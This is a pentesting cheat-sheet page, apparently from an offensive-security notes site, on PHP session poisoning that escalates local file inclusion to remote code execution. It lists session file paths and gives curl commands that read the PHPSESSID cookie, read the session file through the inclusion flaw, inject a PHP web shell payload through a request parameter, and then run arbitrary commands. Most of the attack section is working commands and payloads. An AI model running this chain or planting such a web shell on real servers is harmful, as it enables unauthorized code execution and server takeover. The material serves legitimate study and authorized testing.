PRIMARY CATEGORY → WEB ATTACKS
REFERENCES
PHP Session Poisoning using LFISee here

PHP Session Poisoning - LFI to RCE

This attack vector requires writing PHP Code in a field we control that gets logged into a log file on the remote machine

Then, that file is included in order to execute PHP Code

For this attack to work, the user who executes the PHP or Apache processes, should have read privileges over the logged files

The PHP Session Poisoning works by poisoning a parameter stored inside the PHPSESSID cookie

System Path of PHPSESSID Details

Related PHP Directive → session.save_path

The details of PHPSESSID cookies are stored in session files on the back-end

Windows
C:\Windows\Temp\sess_<PHPSESSID_VALUE>
Linux
/var/lib/php/sessions/sess_<PHPSESSID_VALUE>
Exploitation
Extracting the PHPSESSID Value
curl --silent --request GET --location --head '<URL>' |& grep -i -- 'PHPSESSID'
Use the LFI to examine the PHPSESSID File Content
curl --silent --request GET --location 'http://domain.tdl/home.php?file=/var/lib/php/sessions/sess<PHPSESSID_VALUE>'
Poisoning Cookie’s Data controlled by the User

Next, check if any data in the session file is under your control i.e. if it can be modified by the user

  • Example I

When a user logs into a Web Application, the user’s name appears as a field within the session file of the cookie

  • Example II

The session file may contain a language value which is controlled by the GET parameter ?language=<VALUE>

Writing PHP Code to the Session File through the controlled data

Therefore, an attacker could register a user whose name contains PHP Code and point to the session file through the LFI . This PHP Code will be executed

The same applies for the case of the URL Parameter, if there is a URL Parameter whose value is stored in the session file related to the user’s cookie, just poison this parameter by writing PHP Code as its value

curl --silent --location --request GET 'http[s]://domain.tld/index.php?language=<?php system($_GET["cmd"]);?>' # URL Encoded
Including the Session File using the LFI - Executing Commands through the Injected PHP Code
curl --silent --location --request GET 'https[s]://domain.tld/home.php?file=/var/lib/php/sessions/sess_<PHPSESSID_VALUE>&cmd=<COMMAND>'